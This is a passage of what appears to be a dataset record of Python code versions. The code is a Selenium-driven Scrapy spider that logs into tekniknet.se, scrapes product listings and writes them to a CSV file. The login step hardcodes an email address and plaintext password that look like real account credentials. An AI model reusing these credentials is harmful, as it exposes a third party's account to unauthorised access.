+ ' ' + ',' + ' ' + ',' +\n csv_stock + ',' + list4[m] + '\\n')\n elif len(csv_image_url) == 10:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list4_categories[m].split('/')[1] + ',' +\n list4_categories[m].split('/')[2] + ',' +\n list4_categories[m].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + csv_image_url[9] + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + csv_stock + ',' + list4[m] + '\\n')\n elif len(csv_image_url) == 11:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list4_categories[m].split('/')[1] + ',' +\n list4_categories[m].split('/')[2] + ',' +\n list4_categories[m].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + csv_image_url[9] + ',' +\n csv_image_url[10] + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + csv_stock + ',' + list4\n [m] + '\\n')\n elif len(csv_image_url) == 12:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list4_categories[m].split('/')[1] + ',' +\n list4_categories[m].split('/')[2] + ',' +\n list4_categories[m].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + csv_image_url[9] + ',' +\n csv_image_url[10] + ',' + csv_image_url[11] +\n ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' +\n ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n csv_stock + ',' + list4[m] + '\\n')\n elif len(csv_image_url) == 13:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list4_categories[m].split('/')[1] + ',' +\n list4_categories[m].split('/')[2] + ',' +\n list4_categories[m].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + csv_image_url[9] + ',' +\n csv_image_url[10] + ',' + csv_image_url[11] +\n ',' + csv_image_url[12] + ',' + ' ' + ',' + ' ' +\n ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' +\n ',' + csv_stock + ',' + list4[m] + '\\n')\n elif len(csv_image_url) == 14:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list4_categories[m].split('/')[1] + ',' +\n list4_categories[m].split('/')[2] + ',' +\n list4_categories[m].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + csv_image_url[9] + ',' +\n csv_image_url[10] + ',' + csv_image_url[11] +\n ',' + csv_image_url[12] + ',' + csv_image_url[\n 13] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + csv_stock + ',' + list4\n [m] + '\\n')\n elif len(csv_image_url) == 15:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list4_categories[m].split('/')[1] + ',' +\n list4_categories[m].split('/')[2] + ',' +\n list4_categories[m].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + csv_image_url[9] + ',' +\n csv_image_url[10] + ',' + csv_image_url[11] +\n ',' + csv_image_url[12] + ',' + csv_image_url[\n 13] + ',' + csv_image_url[14] + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock +\n ',' + list4[m] + '\\n')\n elif len(csv_image_url) == 16:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list4_categories[m].split('/')[1] + ',' +\n list4_categories[m].split('/')[2] + ',' +\n list4_categories[m].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + csv_image_url[9] + ',' +\n csv_image_url[10] + ',' + csv_image_url[11] +\n ',' + csv_image_url[12] + ',' + csv_image_url[\n 13] + ',' + csv_image_url[14] + ',' +\n csv_image_url[15] + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + csv_stock + ',' + list4[m] + '\\n')\n elif len(csv_image_url) == 17:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list4_categories[m].split('/')[1] + ',' +\n list4_categories[m].split('/')[2] + ',' +\n list4_categories[m].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + csv_image_url[9] + ',' +\n csv_image_url[10] + ',' + csv_image_url[11] +\n ',' + csv_image_url[12] + ',' + csv_image_url[\n 13] + ',' + csv_image_url[14] + ',' +\n csv_image_url[15] + ',' + csv_image_url[16] +\n ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' +\n list4[m] + '\\n')\n elif len(csv_image_url) >= 18:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list4_categories[m].split('/')[1] + ',' +\n list4_categories[m].split('/')[2] + ',' +\n list4_categories[m].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + csv_image_url[9] + ',' +\n csv_image_url[10] + ',' + csv_image_url[11] +\n ',' + csv_image_url[12] + ',' + csv_image_url[\n 13] + ',' + csv_image_url[14] + ',' +\n csv_image_url[15] + ',' + csv_image_url[16] +\n ',' + csv_image_url[17] + ',' + ' ' + ',' +\n csv_stock + ',' + list4[m] + '\\n')\n except Exception as e:\n self.loggger.info(e)\n self.loggger.info('error4')\n file.close()\n self.driver.close()\n",
"step-4": "import scrapy\nimport time\nimport os.path\nfrom selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom tempfile import mkstemp\nfrom shutil import move\nfrom os import fdopen, remove\nfrom datetime import datetime\nimport logging\noutput_timestamp = datetime.today().strftime('%Y-%m-%d-%H%M')\nlog_output_file = 'scrape-order-images-{}.log'.format(output_timestamp)\n\n\nclass ProductSpider(scrapy.Spider):\n name = 'tekniknet_new'\n allowed_domains = ['www.tekniknet.se']\n start_urls = ['https://www.tekniknet.se/#']\n\n def __init__(self):\n options = webdriver.ChromeOptions()\n options.add_argument('--start-maximized')\n self.driver = webdriver.Chrome(chrome_options=options)\n\n def parse(self, response):\n fh = logging.FileHandler(log_output_file)\n fh.setLevel(logging.INFO)\n logging.getLogger('selenium.webdriver.remote.remote_connection'\n ).setLevel(logging.WARNING)\n logging.getLogger('urllib3.connectionpool').setLevel(logging.WARNING)\n logging.getLogger('selenium.webdriver.remote.remote_connection'\n ).addHandler(fh)\n logging.getLogger('urllib3.connectionpool').addHandler(fh)\n logging.getLogger().addHandler(fh)\n self.loggger = logging.getLogger()\n self.driver.get(response.url)\n list1 = []\n list2 = []\n list3 = []\n list4 = []\n list5 = []\n list3_categories = []\n list4_categories = []\n csv_categories1 = ''\n csv_heading = ''\n csv_stock = ''\n csv_price_new = ''\n csv_price_old = ''\n csv_desc = ''\n csv_article_number = ''\n csv_image_url = []\n old_product_url = []\n WebDriverWait(self.driver, 20).until(EC.presence_of_element_located\n ((By.ID, 'email')))\n username = self.driver.find_element_by_id('email')\n username.send_keys('info@themobilestore.se')\n username = self.driver.find_element_by_id('password')\n username.send_keys('order88')\n login = self.driver.find_element_by_class_name('button-confirm')\n login.click()\n time.sleep(5)\n fh, abs_path = mkstemp()\n with fdopen(fh, 'w') as new_file:\n with open('tekniknet.csv') as old_file:\n for line in old_file:\n new_file.write(line.replace('NEW', 'old'))\n remove('tekniknet.csv')\n move(abs_path, 'tekniknet.csv')\n with open('tekniknet.csv', 'r') as ins:\n for line in ins:\n old_product_url.append(line.split(',')[-1])\n file = open('tekniknet.csv', 'a', errors='replace')\n for wrapper1 in self.driver.find_elements_by_class_name('level-0'):\n child_wrapper1 = wrapper1.find_element_by_xpath('./a')\n link1 = child_wrapper1.get_attribute('href')\n list1.append(link1)\n self.loggger.info(\n '*************************************************')\n self.loggger.info(link1)\n for i in range(0, len(list1) - 4):\n self.driver.get(list1[i])\n try:\n WebDriverWait(self.driver, 20).until(EC.\n presence_of_element_located((By.CLASS_NAME, 'inner')))\n for wrapper2 in self.driver.find_elements_by_class_name('inner'\n ):\n try:\n sub2 = wrapper2.find_element_by_class_name('subLinks')\n child_wrapper2 = sub2.find_elements_by_xpath('.//a')\n for child2 in child_wrapper2:\n link2 = child2.get_attribute('href')\n list2.append(link2)\n self.loggger.info(\n '^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^'\n )\n self.loggger.info(link2)\n except Exception as e:\n self.loggger.info(e)\n self.loggger.info('error')\n except:\n try:\n WebDriverWait(self.driver, 20).until(EC.\n presence_of_element_located((By.ID,\n 'categorySubCategories')))\n subcategory = self.driver.find_element_by_id(\n 'categorySubCategories')\n wrapper2_1 = subcategory.find_elements_by_xpath('.//a')\n for child3 in wrapper2_1:\n link2_1 = child3.get_attribute('href')\n list5.append(link2_1)\n for n in range(0, len(list5)):\n self.driver.get(list5[n])\n WebDriverWait(self.driver, 20).until(EC.\n presence_of_element_located((By.ID,\n 'categorySubCategories')))\n subcategory = self.driver.find_element_by_id(\n 'categorySubCategories')\n wrapper2_1_1 = subcategory.find_elements_by_xpath(\n './/a')\n for child3_1 in wrapper2_1_1:\n if child3_1.text != 'Visa alla':\n link2_1_1 = child3_1.get_attribute('href')\n list2.append(link2_1_1)\n except:\n try:\n breadcrumbs2 = self.driver.find_element_by_id(\n 'breadcrumbs')\n categories2 = breadcrumbs2.find_elements_by_xpath(\n './/li')\n csv_categories2 = ''\n for category2 in categories2:\n csv_categories2 = (csv_categories2 + category2.\n text + '/')\n WebDriverWait(self.driver, 20).until(EC.\n presence_of_element_located((By.CLASS_NAME,\n 'listProduct')))\n for wrapper2_2 in self.driver.find_elements_by_class_name(\n 'listProduct'):\n wrapper2_3 = wrapper2_2.find_element_by_xpath(\n './/a')\n link2_2 = wrapper2_3.get_attribute('href')\n list4.append(link2_2)\n list4_categories.append(csv_categories2)\n self.loggger.info(\n '&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&'\n )\n self.loggger.info(link2_2)\n self.loggger.info('error')\n except Exception as e:\n self.loggger.info(e)\n self.loggger.info('error')\n for j in range(0, len(list2)):\n try:\n self.loggger.info('**********-------------- ' + str(j) +\n ' ******************************')\n self.driver.get(list2[j])\n WebDriverWait(self.driver, 30).until(EC.\n presence_of_element_located((By.ID, 'breadcrumbs')))\n breadcrumbs1 = self.driver.find_element_by_id('breadcrumbs')\n categories1 = breadcrumbs1.find_elements_by_xpath('.//li')\n csv_categories1 = ''\n for category1 in categories1:\n csv_categories1 = csv_categories1 + category1.text + '/'\n WebDriverWait(self.driver, 20).until(EC.\n presence_of_element_located((By.CLASS_NAME, 'listProduct'))\n )\n for wrapper3 in self.driver.find_elements_by_class_name(\n 'listProduct'):\n child_wrapper3 = wrapper3.find_element_by_xpath('.//a')\n link3 = child_wrapper3.get_attribute('href')\n list3.append(link3)\n list3_categories.append(csv_categories1)\n self.loggger.info(\n '&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&'\n )\n self.loggger.info(link3)\n except Exception as e:\n self.loggger.info(e)\n self.loggger.info('error')\n for k in range(0, len(list3)):\n try:\n if list3[k] not in old_product_url:\n self.loggger.info('----------------------- ' + str\n (k) + ' ******************************')\n self.driver.get(list3[k])\n WebDriverWait(self.driver, 30).until(EC.\n presence_of_element_located((By.ID, 'breadcrumbs')))\n offer = self.driver.find_element_by_id('productPageUpper')\n try:\n heading = offer.find_element_by_class_name('pHeader')\n csv_heading = heading.text.replace(',', '.')\n except:\n self.loggger.info('heading3 non-exist')\n csv_heading = ''\n try:\n stock = offer.find_element_by_class_name('instock')\n csv_stock = stock.text\n except:\n csv_stock = 'Out of stock'\n self.loggger.info('stock3 non-exist')\n csv_stock = ''\n try:\n price_new = offer.find_element_by_class_name(\n 'priceRegular')\n csv_price_new = price_new.text.split(' ')[0]\n except:\n try:\n price_new = offer.find_element_by_class_name(\n 'priceNew')\n csv_price_new = price_new.text.split(' ')[0]\n price_old = offer.find_element_by_class_name(\n 'priceOld')\n csv_price_old = price_old.text.split(' ')[0]\n except:\n self.loggger.info('price3 non-exist')\n csv_price_old = ''\n csv_price_new = ''\n try:\n desc = offer.find_element_by_id('pDesc')\n csv_desc = desc.get_attribute('innerHTML').replace(',',\n '-').replace('\\n', ' ').replace('\\r', '').rstrip(\n ).lstrip()\n except:\n self.loggger.info('description3 non-exist')\n csv_desc = ''\n try:\n article_number = offer.find_element_by_id(\n 'pManufacturer')\n csv_article_number = article_number.text.split(' ')[-1\n ].replace(',', '.')\n except:\n self.loggger.info('article number3 non-exist')\n csv_article_number = ''\n try:\n pimages = offer.find_elements_by_xpath('.//img')\n csv_image_url = []\n for pimage in pimages:\n image_url = pimage.get_attribute('src')\n if image_url not in csv_image_url:\n csv_image_url.append(image_url)\n except:\n self.loggger.info('image3 non-exist')\n if len(csv_image_url) == 1:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n csv_stock + ',' + list3[k] + '\\n')\n elif len(csv_image_url) == 2:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + csv_stock + ',' + list3[k] + '\\n')\n elif len(csv_image_url) == 3:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + csv_stock + ',' + list3\n [k] + '\\n')\n elif len(csv_image_url) == 4:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock +\n ',' + list3[k] + '\\n')\n elif len(csv_image_url) == 5:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n csv_stock + ',' + list3[k] + '\\n')\n elif len(csv_image_url) == 6:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + csv_stock + ',' + list3[k] + '\\n')\n elif len(csv_image_url) == 7:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + csv_stock + ',' + list3\n [k] + '\\n')\n elif len(csv_image_url) == 8:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock +\n ',' + list3[k] + '\\n')\n elif len(csv_image_url) == 9:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n csv_stock + ',' + list3[k] + '\\n')\n elif len(csv_image_url) == 10:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + csv_image_url[9] + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + csv_stock + ',' + list3[k] + '\\n')\n elif len(csv_image_url) == 11:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + csv_image_url[9] + ',' +\n csv_image_url[10] + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + csv_stock + ',' + list3\n [k] + '\\n')\n elif len(csv_image_url) == 12:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + csv_image_url[9] + ',' +\n csv_image_url[10] + ',' + csv_image_url[11] +\n ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' +\n ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n csv_stock + ',' + list3[k] + '\\n')\n elif len(csv_image_url) == 13:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + csv_image_url[9] + ',' +\n csv_image_url[10] + ',' + csv_image_url[11] +\n ',' + csv_image_url[12] + ',' + ' ' + ',' + ' ' +\n ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' +\n ',' + csv_stock + ',' + list3[k] + '\\n')\n elif len(csv_image_url) == 14:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + csv_image_url[9] + ',' +\n csv_image_url[10] + ',' + csv_image_url[11] +\n ',' + csv_image_url[12] + ',' + csv_image_url[\n 13] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + csv_stock + ',' + list3\n [k] + '\\n')\n elif len(csv_image_url) == 15:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + csv_image_url[9] + ',' +\n csv_image_url[10] + ',' + csv_image_url[11] +\n ',' + csv_image_url[12] + ',' + csv_image_url[\n 13] + ',' + csv_image_url[14] + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock +\n ',' + list3[k] + '\\n')\n elif len(csv_image_url) == 16:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + csv_image_url[9] + ',' +\n csv_image_url[10] + ',' + csv_image_url[11] +\n ',' + csv_image_url[12] + ',' + csv_image_url[\n 13] + ',' + csv_image_url[14] + ',' +\n csv_image_url[15] + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + csv_stock + ',' + list3[k] + '\\n')\n elif len(csv_image_url) == 17:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + csv_image_url[3] + ',' +\n csv_image_url[4] + ',' + csv_image_url[5] + ',' +\n csv_image_url[6] + ',' + csv_image_url[7] + ',' +\n csv_image_url[8] + ',' + csv_image_url[9] + ',' +\n csv_image_url[10] + ',' + csv_image_url[11] +\n ',' + csv_image_url[12] + ',' + csv_image_url[\n 13] + ',' + csv_image_url[14] + ',' +\n csv_image_url[15] + ',' + csv_image_url[16] +\n ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' +\n list3[k] + '\\n')\n elif len(csv_image_url) >= 18:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n 